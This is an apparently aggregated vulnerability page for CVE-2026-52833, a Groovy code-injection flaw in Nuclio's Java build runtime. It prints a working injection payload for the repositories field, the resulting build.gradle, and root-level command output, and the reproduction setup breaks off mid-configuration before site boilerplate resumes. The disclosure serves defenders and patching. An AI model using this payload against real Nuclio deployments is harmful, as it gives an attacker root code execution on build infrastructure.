🛡️ CVE-2026-52833 — nuclio

🟠 CVSS 8.0 — High ✅ No Known Exploit CWE-94 OSV
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Nuclio: Unsanitized runtimeAttributes.repositories injected into Groovy build.gradle leads to build-time RCE

Summary

Nuclio's Java runtime generates a build.gradle file during function builds using Go's text/template package. The template renders runtimeAttributes.repositories[] values with the {{ . }} action, which performs no escaping. An attacker can embed a closing brace (}) to break out of the repositories {} block and append arbitrary Groovy statements that execute unconditionally during the Gradle configuration phase.

The Dashboard API runs with NOP authentication by default, so no credentials are required. The build container runs as root. The injected command output confirmed by dynamic testing:

```

[RCE-PROOF] uid=0(root) gid=0(root) groups=0(root)

nuclio-kanikojob.nuclioprocessorvul006rcev3latest.tkxsslz06ppcr

root

BUILD SUCCESSFUL in 512ms

```

  • CWE: CWE-94 (Improper Control of Generation of Code / Code Injection)
  • Affected versions: Nuclio <= 1.15.27 (latest as of 2026-05-17, dynamically verified)

Details

Root Cause

pkg/processor/build/runtime/java/runtime.go — function createGradleBuildScript()

Step 1. User input flows from the API into the template data map without validation

types.go:50-64newBuildAttributes() decodes runtimeAttributes with no content inspection. Any string is accepted for each element of Repositories:

```go

// pkg/processor/build/runtime/java/types.go:50-64

func newBuildAttributes(encodedBuildAttributes map[string]interface{}) (*buildAttributes, error) {

newBuildAttributes := buildAttributes{}

if err := mapstructure.Decode(encodedBuildAttributes, &newBuildAttributes); err != nil {

return nil, errors.Wrap(err, "Failed to decode build attributes")

}

if len(newBuildAttributes.Repositories) == 0 {

newBuildAttributes.Repositories = []string{"mavenCentral()"}

}

return &newBuildAttributes, nil // no validation of repository string contents

}

```

Step 2. text/template renders repositories verbatim into Groovy DSL

runtime.go:111,139 — the template is parsed with text/template, which does not HTML-encode or escape special characters. {{ . }} emits each repository string as-is:

```go

// runtime.go:111

gradleBuildScriptTemplate, err := template.New("gradleBuildScript").Parse(j.getGradleBuildScriptTemplateContents())

// runtime.go:139

err = gradleBuildScriptTemplate.Execute(io.MultiWriter(&gradleBuildScriptTemplateBuffer, buildFile), data)

```

The template section for repositories (runtime.go:155-159):

```

repositories {

{{ range .Repositories }}

{{ . }}

{{ end }}

}

```

{{ . }} is the verbatim output action. Because text/template (unlike html/template) applies no contextual escaping, any character — including }, (, ), newlines — is written directly to the .gradle file.

Step 3. Gradle evaluates the injected Groovy at configuration phase

The generated build.gradle is passed to ./build-user-handler.sh inside the quay.io/nuclio/handler-builder-java-onbuild container. That script runs:

```sh

gradle tasks # configuration phase: top-level Groovy runs

gradle userHandler # configuration phase: top-level Groovy runs again

```

Groovy evaluates every top-level statement in build.gradle before executing any task. Injected code therefore runs unconditionally on both invocations.

Injection Mechanics

Payload for repositories[0]:

```

mavenCentral()

}

println('[RCE-PROOF] ' + ['sh', '-c', 'id && hostname && whoami'].execute().text)

repositories {

```

Generated build.gradle (confirmed by Dashboard DEBUG log at path /tmp/nuclio-build-378373988/staging/handler/build.gradle):

```groovy

plugins {

id 'com.github.johnrengelman.shadow' version '5.2.0'

id 'java'

}

repositories {

mavenCentral()

}

println('[RCE-PROOF] ' + ['sh', '-c', 'id && hostname && whoami'].execute().text)

repositories {

}

dependencies {

compile files('./nuclio-sdk-java-1.1.0.jar')

}

shadowJar {

baseName = 'user-handler'

classifier = null

}

task userHandler(dependsOn: shadowJar)

```

The } on line 9 closes the repositories {} block. println(...) on line 10 becomes a top-level Groovy statement. repositories { on line 11 re-opens a new block that the template's trailing } correctly closes, making the entire file syntactically valid.

Groovy's List.execute() extension method (e.g., ['sh', '-c', 'cmd'].execute()) runs an OS process. .text captures its standard output. The injected println logs the output to Gradle's stdout, which appears in the kaniko executor log.

Proof of Concept

Environment Setup

The following steps reproduce the verified environment. All commands were executed and verified on 2026-05-17.

1. Create a dedicated kind cluster

```bash

cat > /tmp/kind-vul006.yaml <<'EOF'

kind: Cluster

apiVersion: kind.x-k8s.io/v1alpha4

nodes:

  • role: control-plane

extraPortMappings:

  • containerPort: 8070

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is high, an attacker needs administrative privileges on the target. No user interaction is required. The scope is changed, meaning a successful attack can affect components beyond the vulnerable one. Rated impact: confidentiality high, integrity high, availability high.

Weakness class

CVE-2026-52833 is classified as CWE-94: Code Injection. Input is incorporated into code that the runtime evaluates, so an attacker can have their own code executed.

Affected software

CVE-2026-52833 is recorded against 1 package.

  • github.com/nuclio/nuclio

Timeline and source

Published on 16 July 2026 and last revised on 21 July 2026. No public exploit is currently recorded for this entry. A vendor advisory or fix has been published. Record sourced from OSV.

References

github.com (Web)
github.com (Web)
github.com (Web)
github.com (Package)
github.com (Web)

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE CWE-94
Public Exploit ✅ No
Source OSV
Published 2026-07-16
Updated 2026-08-12
Modified 2026-07-21

Affected Packages

Software From version Fixed in
github.com/nuclio/nuclio

Similar Threats

Site Security Check

Is nuclio part of your stack?

CVE-2026-52833 is rated CVSS 8.0 High. BotEraser scans your installation against known CVE records and tells you whether this vulnerability applies to the versions you actually run.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.